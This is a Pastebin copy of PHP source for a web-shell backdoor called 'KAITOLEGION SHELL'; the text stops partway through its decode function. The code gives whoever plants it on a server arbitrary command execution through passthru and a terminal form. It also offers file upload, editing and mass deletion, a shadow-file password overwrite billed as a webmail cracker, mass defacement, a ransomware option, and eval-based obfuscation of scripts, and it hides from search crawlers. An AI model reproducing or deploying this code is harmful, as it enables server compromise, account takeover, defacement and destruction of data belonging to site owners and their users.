API tools faq
paste
kaitolegion

KAITOLEGION SHELL

kaitolegion
Apr 8th, 2020
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 44.56 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. set_time_limit(0);
  4. error_reporting(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. include(@passthru($_GET['kaito']));
  12. $password = "8c72db75b59b04a5401d1d00f268e8c0"; // pass: kaito@legion
  13. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  14. $userAgents = array("Googlebot",
  15. "Slurp",
  16. "MSNBot",
  17. "PycURL",
  18. "facebookexternalhit",
  19. "ia_archiver",
  20. "crawler",
  21. "Yandex",
  22. "Rambler",
  23. "Yahoo! Slurp",
  24. "YahooSeeker",
  25. "bingbot");
  26. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  27. header('HTTP/1.0 404 Not Found');
  28. exit;
  29. }
  30. }
  31.  
  32. if (isset($_GET['logout'])) {
  33. @logout();
  34. }
  35. function logout() {
  36. unset($_SESSION[@md5($_SERVER['HTTP_HOST'])]);
  37. @header("Location: ".$_SERVER['PHP_SELF']);
  38. }
  39.  
  40.  
  41. function login(){
  42. echo '
  43. <head>
  44. <title>PLEASE LOGIN!</title>
  45. <link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
  46. <meta name="viewport" content="width=device-width, initial-scale=0.5">
  47. <meta property="og:image" content="https://avatars0.githubusercontent.com/u/47966968?s=400&u=41f6e21d009537f92b523400f82b036d9945aca6">
  48. <meta name="author" content="Kaito Legion">
  49. <meta name="description" content=" [ PLEASE LOGIN! ]">
  50. <style>
  51. *{
  52. font-family:Share Tech Mono;
  53. font-weight:bold;
  54. }
  55. body {
  56. margin:0;
  57. padding:0;
  58. background:black;
  59. }
  60.  
  61. input[type=password]{
  62. border:1px solid white;
  63. border-radius:3px;
  64. padding:3px;
  65. color:white;
  66. outline:none;
  67. height:20px;
  68. font-size:10px;
  69. width:200px;
  70. margin-bottom:10px;
  71. background:black;
  72. }
  73. font{
  74. font-size:13px;
  75. color:white;
  76. }
  77. </style>
  78. </head>
  79. <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  80. <body>
  81. <center><br>
  82. <img style="border-radius:100%; height:220px; width:220px;" src="https://avatars0.githubusercontent.com/u/47966968?s=400&u=41f6e21d009537f92b523400f82b036d9945aca6" width="230px" height="230px" border="0">
  83. <br><br>
  84. <font style="color:gold; font-size:30px;">Kaito Was Here</font>
  85. <br><br>
  86. <font>Welcome Kaito Legion Your Shell is waiting for you <br> It\'s your time to Deface GOOD LUCK!.</font>
  87. <br><br>
  88. <br>
  89. <form method="post">
  90. <input name="password" placeholder="Password" type="password"><br>
  91. </form><br><br>
  92. <font>COPYRIGHT &copy; KAITOLEGION.</font>
  93. <br><br>
  94. </center>
  95. </body>
  96. ';
  97. exit;
  98. }
  99.  
  100. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  101. if( empty($password) || ( isset($_POST['password']) && (md5($_POST['password']) == $password) ) && (empty($username) || (isset($_POST['username']) && ($_POST['username']) == $username) ) )
  102. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  103. else
  104. login();
  105. echo "
  106. <html>
  107. <head>
  108. <title>KAITOLEGION WAS HERE</title>
  109. <link href='https://fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'>
  110. <link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css'>
  111. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.1/css/all.css' integrity='sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr' crossorigin='anonymous'>
  112. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css' />
  113. <script src='https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js'></script>
  114. <script src=\"https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js\" type=\"text/javascript\"></script>
  115. <meta name='viewport' content='width=device-width, initial-scale=0.5'>
  116. <style>
  117. * {
  118. font-family: Share Tech Mono;
  119. }
  120. body {
  121. background:black;
  122. }
  123. h1 {
  124. font-size: 15px;
  125. color: white;
  126. }
  127.  
  128. font {
  129. color:white;
  130. border-radius:5px;
  131. padding:6px;
  132. }
  133. font a {
  134. color:cyan;
  135. text-decoration:none;
  136. font-size:15px;
  137. font-weight:bold;
  138. font-style:bold;
  139. }
  140. font a:hover{
  141. color:yellow;
  142. }
  143. h1 {
  144. font-size:20px;
  145. text-align:center;
  146. }
  147. p {
  148. color:white;
  149. font-weight:bold;
  150. font-size:15px;
  151. }
  152. a {
  153. text-decoration:none;
  154. color:yellow;
  155. }
  156.  
  157.  
  158. table {
  159. padding:1px 1px; width:600px; color:white;
  160. }
  161.  
  162. .kaito {
  163. animation-name: rotate ;
  164. animation-duration: 5s;
  165. animation-play-state: running;
  166. animation-timing-function: linear;
  167. animation-iteration-count: infinite;
  168. opacity: 0.8;filter: alpha(opacity=50);} img:hover {opacity: 1.0;filter: alpha(opacity=100);
  169. }
  170.  
  171. @keyframes rotate{
  172. 10% {transform:rotateY(36deg)}
  173. 20% {transform:rotateY(72deg)}
  174. 30% {transform:rotateY(108deg)}
  175. 40% {transform:rotateY(144deg)}
  176. 50% {transform:rotateY(180deg)}
  177. 60% {transform:rotateY(216deg)}
  178. 70% {transform:rotateY(252deg)}
  179. 80% {transform:rotateY(288deg)}
  180. 90% {transform:rotateY(324deg)}
  181. 100% {transform:rotateY(360deg)}
  182. }
  183.  
  184. .tb {
  185. width:620px;
  186. height:150px;
  187. }
  188.  
  189. #snackbar {
  190. visibility: hidden;
  191. max-width: 120px;
  192. background-color: cyan;
  193. font-weight:bold;
  194. color: black;
  195. text-align: center;
  196. border-radius: 3px;
  197. padding:10px 16px;
  198. position: fixed;
  199. z-index: 1;
  200. bottom: 30px;
  201. font-size: 13px;
  202. left:50%;
  203. width:200px;
  204. transform:translateX(-50%);
  205. box-shadow:0 2px 4px rgba(0,0,0,0.65);
  206. }
  207.  
  208.  
  209. #snackbar.show {
  210. visibility: visible;
  211. -webkit-animation: fadein 0.5s, fadeout 0.5s 2.5s;
  212. animation: fadein 0.5s, fadeout 0.5s 2.5s;
  213. }
  214.  
  215. @-webkit-keyframes fadein {
  216. from {bottom: 0; opacity: 0;}
  217. to {bottom: 30px; opacity: 1;}
  218. }
  219.  
  220. @keyframes fadein {
  221. from {bottom: 0; opacity: 0;}
  222. to {bottom: 30px; opacity: 1;}
  223. }
  224.  
  225. @-webkit-keyframes fadeout {
  226. from {bottom: 30px; opacity: 1;}
  227. to {bottom: 0; opacity: 0;}
  228. }
  229.  
  230. @keyframes fadeout {
  231. from {bottom: 30px; opacity: 1;}
  232. to {bottom: 0; opacity: 0;}
  233. }
  234.  
  235. </style>
  236. </head>
  237. <body>
  238. <center>
  239. <br>
  240. <div class='kaito'>
  241. <img style='border-radius:100%; height:220px; width:220px;' src='https://avatars0.githubusercontent.com/u/47966968?s=400&u=41f6e21d009537f92b523400f82b036d9945aca6' width='250px' height='250px' border='0'>
  242. </div><br>
  243. <h1 style='color:gold; font-weight:bold; font-size:30px;'>WELCOME KAITO! ^_^</h1>
  244. <br><div class='tb'>
  245. <p style='margin:0; text-align:left; font-size:15px;'>Uname: <span style='color:cyan;'>".substr(@php_uname(), 0, 120)."</span>
  246. <p style='margin:0; text-align:left; font-size:15px;'>PHP Version: <span style='color:cyan;'>".phpversion()."</span>
  247. <p style= 'margin:0; text-align:left; font-size:15px;'>Current User: <span style='color:cyan;'>".get_current_user()."</span></p>
  248. <p style='text-align:left; font-size:15px;'>User: <span style='color:cyan;'>".getmyuid()."</span> | Group: <span style='color:cyan;'>".getmygid()."</span> | Server IP: <span style='color:cyan;'>".$_SERVER['REMOTE_ADDR']."</span>
  249. <p style='text-align:left; font-size:15px;'> Path: /";
  250.  
  251. if(isset($_GET['dir'])){
  252. $path = $_GET['dir'];
  253. }else{
  254. $path = getcwd();
  255. }
  256. $path = str_replace('\\','/',$path);
  257. $paths = explode('/',$path);
  258.  
  259. foreach($paths as $id=>$pat){
  260. if($pat == '' && $id == 0){
  261. $a = true;
  262. echo '<a href="?dir=/"></a>';
  263. continue;
  264. }
  265. if($pat == '') continue;
  266. echo '<a style="font-size:15px;" href="?dir=';
  267. for($i=0;$i<=$id;$i++){
  268. echo "$paths[$i]";
  269. if($i != $id) echo "/";
  270. }
  271. echo '">'.$pat.'</a>/';
  272. }
  273. echo "</div>";
  274. $file = $_SERVER['PHP_SELF'];
  275. echo "</p>
  276. <form method='post'>
  277. <font>[ <a href='$file'>Home</a> ]</font>
  278. <font>[ <a href='$file?dir=$path&path=adminer'>Adminer</a> ]</font>
  279. <font>[ <a href='$file?dir=$path&path=uploader'>Upload</a> ]</font>
  280. <font>[ <a href='?path=webmail'>Webmail Cracker</a> ]</font>
  281. <font>[ <a href='?path=symlink'>Symlink</a> ]</font><br>
  282. <font>[ <a href='$file?dir=$path&path=md'>Mass Deface</a> ]</font>
  283. <font>[ <a href='?path=delete'>Delete Files</a> ]</font>
  284. <font>[ <a href='$file?dir=$path&do=ransomware'>Ransomware</a> ]</font>
  285. <font>[ <a href='?path=zh'>Zone H</a> ]</font><br>
  286. <font>[ <a href='?path=encode_script'>Encode Script</a> ]</font>
  287. <font>[ <a href='?path=decode_script'>Decode Script</a> ]</font>
  288. <font>[ <a href='?path=No_Redirect&do=noredirect'>NoRedirect</a> ]</font>
  289. <font>[ <a href='?path=Dashboard_Finder'>DashFinder</a> ]</font><br>
  290. <font>[ <a href='?path=smtp'>Smtp Cracker</a> ]</font>
  291. <font>[ <a href='?path=command'>Command</a> ]</font>
  292. <font>[ <a href='?path=about'>About</a> ]</font>
  293. <font>[ <a href='https://www.google.com/search?q=Mr.KaitoX'>Whoami</a> ]</font>
  294. <font>[ <a href='?logout'>Logout</a> ]</font>
  295. </form>
  296. ";
  297.  
  298. if ($_GET['path']=='adminer'){
  299. echo "<form method='post'>
  300. <input type='submit' name='create' value='create adminer'>
  301. </form>";
  302. if(isset($_POST['create'])){
  303. $adminer = file_get_contents("https://pastebin.com/raw/f7M69MgQ");
  304. $adm = fopen('x.txt','w');
  305. fwrite($adm,$adminer);
  306. if(copy('x.txt',$path.'/'.'adminer.php')){
  307. echo '<p style="color:cyan;">Adminer Was Created</p>';
  308. fclose($adm);
  309. }
  310. unlink('x.txt');
  311. }
  312. }
  313.  
  314. else if ($_GET['path']=='command'){
  315. $uid = posix_getpwuid(posix_geteuid());
  316. echo "<form method='POST'>";
  317. print "<p style='color:red; font-size:10px;'>".$uid['name']."@:~$ ";
  318. print "<input name='cmd' style='width:300px; height:25px; outline:none; color:white; font-weight:bold; font-family:courier; background:black; border:2px solid white;' type='text'>";
  319. print "<input type='submit' style='padding-bottom:3px;' value='>>'></p>";
  320. echo "</form>";
  321. $cmd = $_POST['cmd'];
  322. /*print "<p style='color:red; font-weight:bold;'>";*/
  323. @terminal($cmd);
  324. /*print "</p>";*/
  325. }
  326.  
  327. else if ($_GET['path']=='symlink'){
  328. echo "<h1>Symlink</h1>";
  329. echo '<form method="POST"><input type="submit" name="start" value="Start Symlinking" /></form>';
  330. sym();
  331. }
  332.  
  333. else if ($_GET['path']=='smtp'){
  334. echo "<h1 style='font-size:25px;'>Smtp Cracker</h1><br>";
  335. echo '<form method="POST"><input type="submit" name="crack" value="Crack" /></form>';
  336. smtp();
  337. }
  338.  
  339. else if ($_GET['path']=='webmail'){
  340. echo "<h1>Webmail Cracker</h1>";
  341. echo "<form method='POST'>
  342. <input style='color:white; background:black; border:2px solid white;' type='text' name='password' placeholder='Change Password'>
  343. <input type='submit' name='crack' value='Crack'>
  344. </form>";
  345. if(isset($_POST['password'])){
  346. if(!empty($_POST['password'])){
  347. ini_set('max_execution_time',0);
  348. ini_set('memory_limit',-1);
  349. $ports=array(25, 587, 465, 110, 995, 143 , 993);
  350. $primary_port='25';
  351. $user=get_current_user();
  352. $password=$_POST['password'];
  353. $pwd = crypt($password,'$6$roottn$');
  354. $t = $_SERVER['SERVER_NAME'];
  355. $t = @str_replace("www.","",$t);
  356. @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
  357. $ex=explode("\r\n",$passwd);
  358. @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak');
  359. @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
  360. foreach($ex as $ex){
  361. $ex=explode(':',$ex);
  362. $e= $ex[0];
  363. if ($e){
  364. $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
  365. echo '<span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'</span><br>'; "</center>";
  366. }}
  367. foreach ($ports as $port)
  368. {
  369. $connection = @fsockopen($t, $port, $errno, $errstr, 2);
  370. if (is_resource($connection))
  371. {
  372. echo '<p>' . $_SERVER['REMOTE_ADDR'] . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</p>' . "\n";
  373. fclose($connection);
  374. }
  375. }
  376. } else {
  377. echo "<p style='color:red;'>Please Enter Password</p>";
  378. }
  379. }
  380.  
  381.  
  382. }
  383.  
  384. // Ransomware
  385.  
  386. else if($_GET['do']=='ransomware'){
  387. echo "<h1 style='font-size:25px;'>Ransomware</h1>";
  388. echo "
  389. <form method='post'>
  390. <select name='locker'>
  391. <option value='1'>Locked</option>
  392. <option value='2'>Unlocked</option>
  393. </select>
  394. <input type='submit' value='Go'>
  395. </form>
  396. ";
  397. $locker = $_POST['locker'];
  398. $e = $_SERVER['PHP_SELF'];
  399. $file = str_replace("/","",$e);
  400. @ran($locker,$path,$file);
  401.  
  402.  
  403. }
  404.  
  405. /** uploader **/
  406. else if ($_GET['path']=='uploader'){
  407. echo "<br><form enctype='multipart/form-data' method='POST'>
  408. <input style='border:2px solid white; color:white;' type='file' name='myfile'>
  409. <input type='submit' name='upload' value='upload'>
  410. </form>";
  411. if(isset($_POST['upload'])){
  412. if(!empty($_FILES['myfile']['name'])){
  413. if(copy($_FILES['myfile']['tmp_name'],$path.'/'.$_FILES['myfile']['name'])){
  414. echo '<p style="color:cyan; font-size:15px;">File Uploaded: '.$_FILES['myfile']['name'].'</p>';
  415. } else {
  416. echo "<p style='font-size:15px; color:red;'>Failed Upload!".$_FILES['myfile']['name']."</p>";
  417. }
  418. }else{
  419. echo "<p style='color:red;'>Empty File!</p>";
  420. }
  421. }
  422.  
  423. }
  424. /**Mass Encrypt**/
  425.  
  426. else if ($_GET['path']=='delete'){
  427. echo "<h1>Mass Delete</h1>";
  428. echo "<form method='POST'><input type='submit' name='deleteall' value='Delete All Files & Directory'></form>";
  429. $path = getcwd();
  430. $files = scandir($path);
  431. if(isset($_POST['deleteall'])){
  432. foreach($files as $files){
  433. unlink($files);
  434. rmdir($files);
  435. echo "<p>$files -> Deleted<br></p>";
  436. }
  437. }
  438. }
  439.  
  440. /**About**/
  441. else if ($_GET['path']=='about'){
  442. echo "<h1 style='font-size:25px;'>-=[ About ]=-</h1>";
  443. echo "<p style='font-size:20px;'>This Shell Backdoor Was Developed by Kaito Legion
  444. <br>a.k.a Mr.KaitoX
  445. for educational purpose only.
  446. </p>";
  447. echo "<center><p style='font-size:20px;'>-=[ Follow Me ]=-</p></center>";
  448. echo "<p style='font-size:16px;'>Facebook : <a href='https://www.facebook.com/kaitolegionofficial'>https://www.facebook.com/kaitolegionofficial</a></p>";
  449. echo "<p style='font-size:16px;'>Youtube : <a href='https://www.youtube.com/kaitolegion'>https://www.youtube.com/kaitolegion</a></p>";
  450.  
  451. }
  452. else if ($_GET['path']=='md'){
  453.  
  454. echo"
  455. <form method='POST'>
  456. <label style='margin-right:10px;background:cyan; width:100px; border-radius:5px; color:black; font-weight:bold;'>Filename:</label><br>
  457. <input name='namefile' style='width:500px; background:black; color:cyan; font-weight:bold; border:2px solid white; outline:none;' type='text' name='filename' placeholder='Example: kaito.html'>
  458. <br>
  459. <label style='margin-top:8px; background:cyan; width:100px; border-radius:5px; color:black; font-weight:bold;'>Directory:</label>
  460. <br>
  461. <input name='massdefacedir' style='width:500px; background:black; color:cyan; font-weight:bold; border:2px solid white; ' type='text' value='";
  462. echo $_GET['dir'];
  463. echo "/'>
  464. <br>
  465. <label style='margin-top:8px; background:cyan; border-radius:5px; width:150px; color:black; font-weight:bold;'>Deface Script:</label>
  466. <br>
  467. <textarea name='defscript' style='background:black; width:500px; height:300px; border:2px solid white; color:cyan; outline:none;' placeholder='Deface Script Here!'></textarea>
  468. <br>
  469. <input name='deface' value='Defaced!' style='width:100px;' type='submit' value='Submit'>
  470. </form>";
  471. $deface = $_POST['deface'];
  472. $massdir = $_POST['massdefacedir'];
  473. $filedef = $_POST['namefile'];
  474. $defscript = $_POST['defscript'];
  475. $deface = $_POST['deface'];
  476.  
  477. if (isset($deface)){
  478. if (!empty($defscript)){
  479. $dir=scandir($massdir);
  480. foreach($dir as $rs) {
  481. if($rs != "." && $rs != ".."){
  482. $fl = fopen("$massdir"."/".$rs."/".$filedef,"w");
  483. fwrite($fl,$defscript);
  484. echo "<p>".$rs." => Defaced<br></p>";
  485. }
  486. }
  487.  
  488. }
  489. else {
  490. echo "<p style='color:red;'>Script is empty!</p>";
  491. }
  492. }
  493. }
  494.  
  495. else if ($_GET['path']=='zh'){
  496. echo "<h1 style='background:cyan; width:190px; padding:5px; border-radius:5px; color:black; font-weight:bold;'>Mass Zone-H Poster</h1>";
  497. zoneh();
  498. }
  499. else if ($_GET['path']=='encode_script'){
  500. echo "<h1 style='background:cyan; width:150px; padding:5px; border-radius:5px; color:black; font-weight:bold;'>Encode Script</h1>";
  501. encrypt();
  502. }
  503. else if ($_GET['path']=='decode_script'){
  504. echo "<h1 style='background:cyan; width:150px; padding:5px; border-radius:5px; color:black; font-weight:bold;'>Decode Script</h1>";
  505. decrypt();
  506. }
  507. else if ($_GET['path']=='No_Redirect'){
  508. echo "<h1 style='background:cyan; width:150px; padding:5px; border-radius:5px; color:black; font-weight:bold;'>No Redirect</h1>";
  509.  
  510. if ($_GET['do'] == 'noredirect'){
  511. echo "<form method='POST'>";
  512. echo "<input name='URL' style='color:white; width:300px; background:black; border:solid 2px white;' type='text' placeholder='URL Target'>
  513. <input name='submit' value=\"GO\" type=\"submit\">
  514. </form>";
  515. if(isset($_POST['submit'])){
  516. if(substr($_POST['URL'], 0, 4) == 'http'){
  517.  
  518. echo url_get_contents(htmlspecialchars($_POST['URL']));
  519.  
  520. } else{
  521. echo "<p style='color:red; font-weight:bold; font-size:20px;'>Sorry Bro. Check your URL<br>Only http or https protocols are allowed</p>";
  522. }
  523. }
  524. }
  525. }
  526.  
  527. else if ($_GET['path']=='Dashboard_Finder'){
  528.  
  529. }
  530.  
  531.  
  532. /* File View */
  533. else if($_GET['filesrc']){
  534. $name = basename($_GET['filesrc']);
  535. $file = htmlspecialchars(file_get_contents($_GET['filesrc']));
  536. echo "<h1 style='background:cyan; font-weight:bold; border-radius:3px; color:black; width:100px; font-size:15px;'>File View</h1>";
  537. echo "<p style='font-weight:bold; font-size:15px;'>Filename : ".$name."</p>";
  538. echo "<textarea style='font-family:monospace; font-size:13px; width:500px; color:white; font-weight:bold; border:2px solid white; background:black; height:400px;'>$file</textarea>
  539. ";
  540. }
  541. /************/
  542.  
  543. /* Edit Option */
  544. else if($_POST['opt'] == 'edit'){
  545. if(isset($_POST['src'])){
  546. $fp = fopen($_POST['path'],'w');
  547. if(fwrite($fp,$_POST['src'])){
  548. echo '<p style="color:cyan; font-size:20px;">Edit File Done</p>';
  549. }else{
  550. echo '<p style="color:red;">Edit File Failed</p>';
  551. }
  552. fclose($fp);
  553. }
  554. echo '<form method="POST">
  555. <h1 style="background:cyan; font-weight:bold; border-radius:3px; color:black; width:100px; font-size:15px;">Edit File</h1>
  556. <textarea style="background:black; font-family:monospace; color:white; border:2px solid white;" cols=70 rows=25 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  557. <input type="hidden" name="path" value="'.$_POST['path'].'">
  558. <input type="hidden" name="opt" value="edit"><br>
  559. <input type="submit" value="Edit" />
  560. </form>';
  561. }
  562.  
  563. /***************/
  564.  
  565.  
  566. /** chmod **/
  567.  
  568. else if($_POST['opt'] == 'chmod'){
  569. if(isset($_POST['perm'])){
  570. if(chmod($_POST['path'],$_POST['perm'])){
  571. echo '<p style="color:cyan; font-size:20px;">Success!</p>';
  572. }else{
  573. echo '<p style="color:red; font-size:20px;">Edit Failed :(</p>';
  574. }
  575. }
  576. echo '<form method="POST">
  577. <p style="font-size:20px;">Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  578. <input type="hidden" name="path" value="'.$_POST['path'].'">
  579. <input type="hidden" name="opt" value="chmod">
  580. <input type="submit" value="Go" /></p>
  581. </form>';
  582. }
  583.  
  584.  
  585.  
  586. /* Rename */
  587. else if($_POST['opt'] == 'rename'){
  588. $renamefile = $_POST['path'];
  589. $newrenamefile = $_POST['newname'];
  590.  
  591. if(isset($_POST['newname'])){
  592.  
  593. if(rename($renamefile,$path.'/'.$newrenamefile)){
  594. home($path);
  595. copyright();
  596. exit;
  597. }
  598. $_POST['name'] = $_POST['newname'];
  599. }
  600. echo '<form method="POST"><p style="background:cyan; font-size:15px; width:100px; border-radius:5px; color:black; font-weight:bold;">New Name</p><input name="newname" style="background:black; border:2px solid white; color:white; border-radius:2px;" type="text" size="20" value="'.$_POST['name'].'" /><input type="hidden" name="path" value="'.$_POST['path'].'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Change" /></form>';
  601.  
  602. }
  603.  
  604. /* Create Folder */
  605.  
  606. else if($_GET['folder'] == 'createfolder'){
  607.  
  608. $name = $_POST['newfol'];
  609. $path = $_GET['dir'];
  610. if(!empty($name)){
  611. if(mkdir("$path"."/"."$name")){
  612. home($path);
  613. copyright();
  614. exit;
  615. } else{
  616. home($path);
  617. copyright();
  618. exit;
  619. }
  620. }
  621. echo '<form method="POST"><p style="background:cyan; font-size:15px; width:120px; border-radius:5px; color:black; font-weight:bold;">Create New Folder </p><input name="newfol" style="background:black; border:2px solid white; outline:none; color:white; border-radius:2px;" type="text" size="20" /><input type="hidden" name="dir" value="'.$_POST['path'].'"><input type="hidden" name="opt" value="newfolder"><input type="submit" value="Create" /></form>';
  622. }
  623.  
  624.  
  625. /* Create File */
  626. else if($_GET['folder'] == 'createfile'){
  627. $fname = $_POST['fname'];
  628. $fscript = $_POST['fscript'];
  629. if (isset($_POST['createfile'])){
  630. if(!empty($fname && $fscript)){
  631. makefile($path,$fname,$fscript);
  632. echo "<body onload=alert('Created')>";
  633. home($path);
  634. copyright();
  635. exit;
  636. } else {
  637. echo "<body onload=alert('Empty')>";
  638. home($path);
  639. copyright();
  640. exit;
  641. }
  642. }
  643. echo '<form method="POST"><p style="background:cyan; font-size:15px; width:100px; border-radius:5px; color:black; font-weight:bold;">Filename: </p><input placeholder="File Name" style="background:black; border:2px solid white; color:cyan; width:300px; outline:none;" type="text" name="fname"><br><br><p style="background:cyan; font-size:15px; width:120px; border-radius:5px; color:black; font-weight:bold;">File Script</p><textarea placeholder="Script.." style="background:black; width:500px; border:2px solid white; border-radius:2px; outline:none; height:200px; color:white; font-family:courier;" type="text" name="fscript"></textarea><br><br><input value="create" name="createfile" type="submit"></form>';
  644.  
  645. }
  646.  
  647. /*******Closed********/
  648.  
  649. else {
  650. home($path);
  651. }
  652.  
  653. // Encrypt Function
  654.  
  655. function encrypt() {
  656. echo "
  657. <form method=\"POST\">
  658. <textarea name='encode_script' style='background:black; width:500px; height:200px; border:2px solid white; color:cyan; outline:none;' placeholder='PHP Script to encode Here!'></textarea>";
  659. echo "<br><br><select style='background:black; border:solid 2px white; color:white; width:500px;' name='type'>
  660. <option value=\"urlencode\">Select</option>
  661. <option value=\"base64\">Base64</option>
  662. <option value=\"base64convert\">base64 - convert_uu</option>
  663. <option value=\"gzinflates\">gzinflate - base64</option>
  664. <option value=\"str2\">str_rot13 - base64</option>
  665. <option value=\"gzinflate\">str_rot13 - gzinflate - base64</option>
  666. <option value=\"str\">str_rot13 - gzinflate - str_rot13 - base64</option>
  667. <option value=\"url\">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  668. </select>";
  669.  
  670. $encode = $_POST['encode_script'];
  671. $button = $_POST['encode_button'];
  672. if(isset($button)) {
  673. $type = $_POST['type'];
  674. switch($type){
  675. case 'urlencode':
  676. $kai = rawurlencode($encode);
  677. break;
  678. case 'base64':
  679. $kai = base64_encode($encode);
  680. $kai = "<?php eval('?>'.base64_decode('$kai'));";
  681. break;
  682. case 'base64convert':
  683. $kai = base64_encode(convert_uuencode($encode));
  684. $kai = "<?php eval('?>'.convert_uudecode(base64_decode('$kai')));";
  685. break;
  686. case 'gzinflates':
  687. $kai = base64_encode(gzdeflate($encode));
  688. $kai = "<?php eval('?>'.gzinflate(base64_decode('$kai')));";
  689. break;
  690. case 'str2':
  691. $kai = base64_encode(str_rot13($encode));
  692. $kai = "<?php eval('?>'.str_rot13(base64_decode('$kai')));";
  693. break;
  694. case 'gzinflate':
  695. $kai = base64_encode(gzdeflate(str_rot13($encode)));
  696. $kai = "<?php eval('?>'.str_rot13(gzinflate(base64_decode('$kai'))));";
  697. break;
  698. case 'str':
  699. $kai = base64_encode(str_rot13(gzdeflate(str_rot13($encode))));
  700. $kai = "<?php eval('?>'.str_rot13(gzinflate(str_rot13(base64_decode('$kai')))));";
  701. break;
  702. case 'url':
  703. $kai = base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($encode))))));
  704. $kai = "<?php eval('?>'.base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode('$kai')))))));";
  705. break;
  706.  
  707. default:
  708.  
  709. break;
  710. }
  711. }
  712. echo '<div id="snackbar">Text Copied</div>';
  713. echo '<script>
  714. function myFunction(){
  715. var x=document.getElementById("snackbar");x.className="show";setTimeout(function(){x.className=x.className.replace("show", "");},3000);
  716. var copyText = document.getElementById("txtencopy");copyText.select();document.execCommand("copy");
  717. }
  718. </script>';
  719.  
  720. echo "<br><br><textarea id='txtencopy' style='background:black; width:500px; height:150px; border:2px solid white; color:cyan; outline:none;' placeholder=' Encode Result..'>$kai</textarea>
  721. <a class='copy' id='lbtn' onclick='myFunction()'>
  722. <br><br><i style='color:cyan; font-size:22px;' class='fa fa-copy'></i></a>
  723. &nbsp;&nbsp;
  724. <a class='share' id='lbtn' onclick='myFunction()'>
  725. <i style='color:cyan; font-size:22px;' class='fa fa-share'></i>
  726. </a>
  727.  
  728. ";
  729. echo "<br><br><input type='submit' name='encode_button' value='Encode'></form>";
  730. }
  731.  
  732. // Decrypt Function
  733. function decrypt() {
  734. echo "<form method=\"POST\">";
  735. echo "<textarea name='decode' style='background:black; width:500px; height:200px; border:2px solid white; color:cyan; outline:none;' placeholder='Text Encrypted Here!'></textarea>";
  736. echo "<br><br>
  737. <select style='background:black; border:solid 2px white; color:white; width:500px;' name='type'>
  738. <option value=\"urlencode\">Select</option>
  739. <option value=\"base64\">Base64</option>
  740. <option value=\"base64convert\">base64 - convert_uu</option>
  741. <option value=\"gzinflates\">gzinflate - base64</option>
  742. <option value=\"str2\">str_rot13 - base64</option>
  743. <option value=\"gzinflate\">str_rot13 - gzinflate - base64</option>
  744. <option value=\"str\">str_rot13 - gzinflate - str_rot13 - base64</option>
  745. <option value=\"url\">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  746. </select>";
  747.  
  748. $decode = $_POST['decode'];
  749. if (isset($decode)) {
  750. $type = $_POST['type'];
  751. switch ($type) {
  752. case 'urlencode':
  753. $kaito = rawurldecode($decode);
  754. break;
  755. case 'base64':
  756. $kaito = base64_decode($decode);
  757. break;
  758. case 'base64convert':
  759. $kaito = convert_uudecode(base64_decode($decode));
  760. break;
  761. case 'gzinflates':
  762. $kaito = gzinflate(base64_decode($decode));
  763. break;
  764. case 'str2':
  765. $kaito = str_rot13(base64_decode($decode));
  766. break;
  767. case 'gzinflate':
  768. $kaito = str_rot13(gzinflate(base64_decode($decode)));
  769. break;
  770. case 'str':
  771. $kaito = str_rot13(gzinflate(str_rot13(base64_decode(($decode)))));
  772. break;
  773. case 'url':
  774. $kaito = base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($decode)))))));
  775. break;
  776. default:
  777.  
  778. break;
  779. }
  780. }
  781.  
  782. echo '<div id="snackbar">Text Copied</div>';
  783. echo '<script>
  784. function myFunction(){
  785.  
  786. var x=document.getElementById("snackbar");x.className="show";setTimeout(function(){x.className=x.className.replace("show", "");},3000);
  787.  
  788. var copyText = document.getElementById("linput");copyText.select();document.execCommand("copy");
  789. }
  790. </script>';
  791.  
  792. echo "<br><br>
  793. <textarea id='linput' style='background:black; width:500px; height:150px; border:2px solid white; color:cyan; outline:none;' placeholder='Decode Result..'>$kaito
  794. </textarea>
  795. <a class='copy' id='lbtn' onclick='myFunction()'>
  796. <br><br><i style='color:cyan; font-size:22px;' class='fa fa-copy'></i></a>
